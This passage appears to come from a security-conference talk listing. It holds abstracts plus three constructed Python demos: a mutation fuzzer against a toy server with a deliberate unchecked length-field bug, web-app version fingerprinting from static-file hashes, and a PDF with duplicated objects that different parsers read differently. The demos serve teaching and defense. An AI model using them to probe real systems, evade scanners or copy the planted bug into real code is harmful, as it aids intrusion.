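As an added illustration of the inline approach, not the speaker's tool and not any real railway protocol: the mutation engine below knows nothing about the protocol it is fuzzing. It takes messages a proxy recorded from a legitimate client session and replays them with generic mutations (bit flips, boundary bytes, boundary 16-bit values at every offset, duplicated slices, truncation). Everything here is constructed, including the three-field wire format, the recorded messages and the stand-in server with its length-field bug; in a deployment the server function would be replaced by a socket send plus a liveness check.

```python
import random

INTERESTING_8 = [0x00, 0x01, 0x7f, 0x80, 0xff]
INTERESTING_16 = [0x0000, 0x0001, 0x00ff, 0x7fff, 0x8000, 0xffff]

def frame(kind, payload):
    """Constructed wire format: 2-byte big-endian payload length, 1-byte type, payload."""
    return len(payload).to_bytes(2, "big") + bytes([kind]) + payload

# Messages the proxy "recorded" from a legitimate client session (constructed).
OBSERVED = [frame(0x01, b"120"), frame(0x01, b"0"), frame(0x02, b"")]

def toy_server(msg):
    """Stand-in for the black-box server. It has a classic bug: it trusts
    the length field when copying the payload into a fixed-size buffer."""
    if len(msg) < 3:
        return b"ERR short"
    declared = int.from_bytes(msg[:2], "big")
    kind, payload = msg[2], msg[3:]
    if kind == 0x01:                      # SET_SPEED
        buf = bytearray(64)
        for i in range(declared):         # bug: no check against len(payload) or len(buf)
            buf[i] = payload[i]
        return b"OK speed=" + bytes(buf[:declared])
    if kind == 0x02:                      # STATUS
        return b"OK running"
    return b"ERR unknown type"

def mutate(msg, rng):
    """Spec-agnostic mutation of one observed message."""
    m = bytearray(msg)
    choice = rng.randrange(5)
    if choice == 0 and m:                          # flip one bit
        m[rng.randrange(len(m))] ^= 1 << rng.randrange(8)
    elif choice == 1 and m:                        # boundary byte value
        m[rng.randrange(len(m))] = rng.choice(INTERESTING_8)
    elif choice == 2 and len(m) >= 2:              # boundary 16-bit value at any offset:
        i = rng.randrange(len(m) - 1)              # this is what hits length fields
        m[i:i + 2] = rng.choice(INTERESTING_16).to_bytes(2, "big")
    elif choice == 3 and m:                        # duplicate a slice (message grows)
        a = rng.randrange(len(m))
        b = rng.randrange(a, len(m)) + 1
        m[b:b] = m[a:b]
    else:                                          # truncate
        m = m[:rng.randrange(len(m) + 1)]
    return bytes(m)

def inline_fuzz(observed, server, iterations=2000, seed=1):
    """Replay recorded messages with mutations and collect server crashes."""
    rng = random.Random(seed)
    crashes = []
    for _ in range(iterations):
        mutated = mutate(rng.choice(observed), rng)
        try:
            server(mutated)
        except Exception as exc:
            crashes.append((mutated, type(exc).__name__))
    return crashes

def smallest_crash(crashes):
    """First-pass triage: the shortest input that still crashes the server."""
    return min(crashes, key=lambda c: len(c[0])) if crashes else None

if __name__ == "__main__":
    found = inline_fuzz(OBSERVED, toy_server)
    print(len(found), "crashing inputs; smallest:", smallest_crash(found))
```

The point to take from the run is that the length-field bug is found without anyone having told the fuzzer where the length field is: substituting boundary 16-bit values at every offset, and truncating recorded messages so the payload no longer matches its declared length, covers that class of bug for any framing the proxy has seen.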

Today’s Reality: Living in Compromise to Advanced Persistent Threats - Charlie Shields

Today's advanced persistent threats by definition evade detection by perimeter defenses and current defense-in-depth concepts, whether you know it or not. Most organizations have developed an over-reliance on network-layer, perimeter-focused solutions that require signatures or profile-based foreknowledge of a given technical threat. As numerous security breaches over the last few years have shown, most signature- and log-based security solutions are already entirely obsolete by the very definition of a focused adversary's methods. Other architectures currently being deployed are based on statistical analysis of netflows and other network-layer telemetry, providing limited and incomplete network visibility.

This session focuses on the true nature and sources of today's difficult threats, and describes solution characteristics, both technology and operations-related, which are required to detect these invisible threats. Mr. Shields will demonstrate techniques that will enable your organization to detect and stop designer malware, zero-day attacks, and non-signature-based threats to improve overall network visibility, and to detect the leakage and exfiltration of valuable organizational data. The session will cover actual technical case studies from the commercial and public sector to illustrate more effective operational methods for monitoring enterprise infrastructures at the application and content/context layers by performing advanced analysis of full packet captures.

Distributed Denial of Service: War Stories from the Cloud Front - Michael Smith

Due to the rise of large-scale botnets, Distributed Denial of Service (DDoS) is making a resurgence, both in attacker capabilities and the impact on target organizations. This presentation is an overview of DDoS attacker capabilities and techniques, defenses against attacks, and lessons learned from responding to numerous DDoS attacks.

The session will cover a very brief description of the Akamai distributed network and a discussion of the history of Akamai's involvement with DDoS mitigation. The session will then dive into the following areas: threat capabilities and tactics, failure patterns during a DDoS attack, preparation prior to an attack, example timelines associated with the July 4th, 2009 attack, and the active response to an ongoing, targeted DDoS attack. Each area will focus on lessons learned that organizations can reproduce in their own environment.

Barcodes: Read it, Write it, Hack it - Michael Smith

Barcodes are everywhere and we’re seeing more and more of them, from the RealID specification to airline boarding passes to beer bottles. This presentation is designed to be a presentation and hands-on workshop for experimentation with barcode readers, writers, and techniques for hacking in that gray area between software, hardware, and the physical world. The presenter will bring software, tools, and a wide variety of examples including his world-famous QR temporary tattoos.

By The Time You've Finished Reading This Sentence, “You're Infected” - Eldon Sprickerhoff

This talk is intended to be a rapid-fire description of 25 tactics currently used by "the bad guys" so that malware STILL evades AV, web reputation filters, IDP systems and practically any other defense thrown at it. Malicious content continues to be a thorn in the side of practically all Internet users. This talk will show the progression of obfuscation techniques and offer insight into the new infiltration methods expected in the future, rife with amusing real-world examples of the tactics.

BLINDELEPHANT: Web Application Fingerprinting with Static Files - Patrick Thomas

Well-known web applications are used for many purposes such as blogging, forums, e-commerce, database management, email and myriad others. Vulnerabilities in these applications (and their plugins) are discovered at an accelerated rate and are abused for site defacement and increasingly to serve malware.

Website administrators need to keep track of which versions of these web applications are installed and update them to a non-vulnerable release. Static file fingerprinting is a technique for identifying the version of a remote web application using only its publicly available resource files. The presentation will detail the steps in this fingerprinting process as implemented in the newly released BlindElephant open source tool, including full automation from database seeding to remote probing. The talk will also share results of an Internet-wide survey of a million sites and describe trends in user patch/update behavior, with implications about effective (and ineffective) ways to motivate end users.
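An added example of the static-file technique described above, written for this page rather than taken from BlindElephant: it seeds a fingerprint database from constructed release trees of an imaginary application, orders probes by how many versions each file can separate, and narrows the candidate versions of a constructed "remote" site by hashing only files any visitor can fetch. The application, its paths and file contents, and the fetch function are all made up.

```python
import hashlib
from collections import defaultdict

# Constructed release trees for a hypothetical application:
# version -> {static path: file content}. In practice these come from
# unpacking every published release archive.
RELEASES = {
    "1.0": {"/js/app.js": "v1 core", "/css/site.css": "body{}", "/js/util.js": "u1"},
    "1.1": {"/js/app.js": "v1 core", "/css/site.css": "body{margin:0}", "/js/util.js": "u1"},
    "2.0": {"/js/app.js": "v2 core", "/css/site.css": "body{margin:0}", "/js/util.js": "u2"},
    "2.1": {"/js/app.js": "v2 core", "/css/site.css": "body{margin:0}", "/js/util.js": "u2"},
}

def digest(content):
    return hashlib.sha1(content.encode()).hexdigest()

def seed_database(releases):
    """Seeding step: path -> {hash -> set of versions that ship exactly that file}."""
    db = defaultdict(lambda: defaultdict(set))
    for version, files in releases.items():
        for path, content in files.items():
            db[path][digest(content)].add(version)
    return db

def probe_order(db):
    """Ask for the most discriminating files first: those whose distinct
    hashes split the known versions into the most groups."""
    return sorted(db, key=lambda path: -len(db[path]))

def fingerprint(db, fetch, all_versions):
    """Narrow the candidate versions using only static files.
    `fetch(path)` returns the remote file body, or None for a 404."""
    candidates = set(all_versions)
    probed = []
    for path in probe_order(db):
        if len(candidates) <= 1:
            break
        body = fetch(path)
        probed.append(path)
        shipped = set().union(*db[path].values())
        if body is None:
            candidates -= shipped        # versions that ship the file are ruled out
            continue
        matching = db[path].get(digest(body))
        if matching is None:
            continue                     # locally modified or unknown build: no information
        candidates &= matching
    return candidates, probed

# Constructed "remote site": runs 2.1, but the admin edited the stylesheet.
REMOTE_SITE = {
    "/js/app.js": "v2 core",
    "/css/site.css": "body{margin:0} /* local tweak */",
    "/js/util.js": "u2",
}

def fake_fetch(path):
    return REMOTE_SITE.get(path)

if __name__ == "__main__":
    db = seed_database(RELEASES)
    versions, probed = fingerprint(db, fake_fetch, RELEASES)
    print("candidate versions:", sorted(versions), "after probing", probed)
```

Two behaviours are deliberate. A hash the database has never seen is treated as no information rather than as a mismatch, because administrators edit stylesheets and scripts, and ruling every version out on a local tweak is the most common way a naive implementation fails. And the site in the example ends up as {2.0, 2.1}: releases that changed no static file cannot be told apart by this method, so the result is a set of candidates, not a single version.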

How do we prevent, detect, respond and recover from CRM failures? - Kelly Walsh

In this session Kelly compares customer-relations breaches with security breaches, specifically their impacts on organizations. He will then map the phases of security incident response and handling (detection, response and recovery) onto customer-relations breaches and, using examples from personal experience, discuss how each phase plays a role in effective and successful CRM. He concludes the session with a proposed answer to the title question: by applying established security risk management methodologies we can reduce the risk of poor CRM and customer-relations breaches.

OMG-WTF-PDF - Julia Wolf

Ambiguities in the PDF specification mean that no two PDF parsers see a file in the same way. This creates many opportunities for exploit obfuscation. PDFs are currently the greatest vector for drive-by (malware-installing) attacks and for targeted attacks on business and government, and A/V technology is extraordinarily poor at detecting them. [Well, except for my company of course; we detect them all.] The PDF format itself is so diverse and vague that an A/V would need to be 100% bug-compatible with the parser in the vulnerable PDF reader. [Not that there are any A/Vs which actually parse PDFs yet.]
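A constructed demonstration of the ambiguity claim, added for this page and not code from the talk: the PDF below defines object 1 twice, and its cross-reference table points only at the first copy. A parser that follows the xref table, as the specification describes, sees one /JS string; a parser that ignores the table and scans for `obj` keywords, a common way to reconstruct damaged files, sees the other or the first depending on whether it keeps the last or the first definition. The object contents are harmless stand-in strings; no exploit is involved.

```python
import re

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\s*(.*?)\s*endobj", re.S)
JS_RE = re.compile(rb"/JS\s*\(([^)]*)\)")

def build_pdf(first=b"benign", second=b"evil"):
    """Construct a PDF in which object 1 is defined twice. The xref table
    points only at the first definition; the second is unreferenced bytes."""
    out = bytearray(b"%PDF-1.4\n")
    off_first = len(out)
    out += b"1 0 obj\n<< /S /JavaScript /JS (" + first + b") >>\nendobj\n"
    out += b"1 0 obj\n<< /S /JavaScript /JS (" + second + b") >>\nendobj\n"
    xref_off = len(out)
    out += b"xref\n0 2\n0000000000 65535 f \n" + b"%010d 00000 n \n" % off_first
    out += b"trailer\n<< /Size 2 /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n" % xref_off
    return bytes(out)

def xref_view(pdf, objnum=1):
    """Spec-following parser: startxref -> xref table -> byte offset -> object."""
    xref_off = int(re.search(rb"startxref\s+(\d+)", pdf).group(1))
    head = re.compile(rb"xref\s+(\d+)\s+(\d+)\s").match(pdf, xref_off)
    first, count = int(head.group(1)), int(head.group(2))
    if not first <= objnum < first + count:
        return None
    entry_off = head.end() + 20 * (objnum - first)      # xref entries are exactly 20 bytes
    obj_off = int(pdf[entry_off:entry_off + 10])
    body = OBJ_RE.match(pdf, obj_off).group(3)
    return JS_RE.search(body).group(1).decode()

def scan_view(pdf, objnum=1, keep="last"):
    """Reconstructing parser: ignores the xref table, scans for 'N G obj' and
    keeps the first or last definition found. Both policies exist in the wild."""
    bodies = [m.group(3) for m in OBJ_RE.finditer(pdf) if int(m.group(1)) == objnum]
    body = bodies[-1] if keep == "last" else bodies[0]
    return JS_RE.search(body).group(1).decode()

def views(pdf):
    """What three parser strategies each think object 1's script is."""
    return {
        "xref": xref_view(pdf),
        "scan_last": scan_view(pdf),
        "scan_first": scan_view(pdf, keep="first"),
    }

def disagreeing(pdf):
    """Cheap triage signal: the strategies disagree, so the file deserves a closer look."""
    return len(set(views(pdf).values())) > 1

if __name__ == "__main__":
    sample = build_pdf()
    print(views(sample), "disagree:", disagreeing(sample))
```

The disagreement itself is the useful detection signal: a scanner that cannot be bug-compatible with every reader can at least parse a file two ways and flag the ones where the views differ. Real files add more variants of the same problem (incremental updates, object streams, stream /Length values that do not match the data), each another place where two implementations can legitimately pick different answers.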